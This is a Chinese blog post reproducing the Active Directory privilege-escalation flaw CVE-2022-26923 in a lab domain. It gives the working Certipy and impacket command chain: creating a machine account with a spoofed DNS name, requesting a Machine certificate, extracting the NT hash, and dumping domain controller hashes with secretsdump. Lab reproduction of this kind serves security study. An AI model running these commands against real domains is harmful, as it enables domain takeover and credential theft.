cve-2022-26923复现——域提权漏洞复现

秒速五厘米 2024-05-23 14:15 147阅读 0赞

cve-2022-26923复现

cve-2022-26923——域提权漏洞复现

文章目录

  • cve-2022-26923复现
  • 前言
  • 一、环境搭建
  • 二、使用工具
  • 三、漏洞复现(在已经拿到一个域控普通账户的前提下)

前言

Active Directory域权限提升漏洞(CVE-2022-26923)允许低权限用户在安装了 Active Directory证书服务(AD CS)服务器角色的默认Active Directory环境中将权限提升到域管理员。

影响范围:

  1. Windows 8.1
  2. Windows 10 Version 1607, 1809,1909, 2004, 20H2, 21H1, 21H2
  3. Windows 11
  4. Windows Server 20082012201620192022

一、环境搭建

首先无脑搭建一个域控服务器,安装了Active Directory证书服务(AD CS),并新建一个普通用户(test1)。
在这里插入图片描述
本次使用的是:win server2019
在这里插入图片描述

二、使用工具

github上无脑下载
Certipy-4.4.0
impacket-master套件

三、漏洞复现(在已经拿到一个域控普通账户的前提下)

1、创建machine account

  1. certipy account create -u test1@attack.local -p TESTtest@123 -user "testpc1" -dns "WIN-CL222QGDIFI.attack.local"

在这里插入图片描述
2、申请CA证书

  1. certipy req -username testpc1\$@attack.local -password LIloPSXJlESPOn1G -ca attack-WIN-CL222QGDIFI-CA -target attack.local -template Machine -debug

在这里插入图片描述
3、获取machine account的NT hash

  1. certipy auth -pfx win-cl222qgdifi.pfx

在这里插入图片描述

4、获取域控账户的hash值

  1. secretsdump.py 'attack.local/WIN-CL222QGDIFI$@attack.local' -hashes aad3b435b51404eeaad3b435b51404ee:fcaae1b2fef3be0a0d6c30332fb11b70

在这里插入图片描述
6、连接域控
在这里插入图片描述

发表评论

表情:
评论列表 (有 0 条评论,147人围观)

还没有评论,来说两句吧...

相关阅读

    相关 XSS漏洞

    XSS漏洞复现 实验环境DVWA > XSS(cross site script) 跨站脚本。属于代码执行的一种,这里执行的是前端代码,一般是javascript代码。